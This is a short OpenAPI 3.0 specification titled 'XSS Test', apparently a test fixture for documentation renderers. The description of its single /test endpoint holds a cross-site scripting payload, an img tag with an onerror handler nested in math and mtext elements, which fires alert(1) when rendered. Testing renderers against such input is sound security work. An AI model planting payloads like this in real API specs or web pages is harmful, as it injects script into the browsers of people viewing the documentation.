openapi: 3.0.0
info:
  title: XSS Test
  version: 1.0.0
paths:
  /test:
    get:
      summary: Trigger XSS
      description: |
        <math><mtext><body><img src=x onerror=alert(1)></body></mtext></math>
      responses:
        '200':
          description: OK
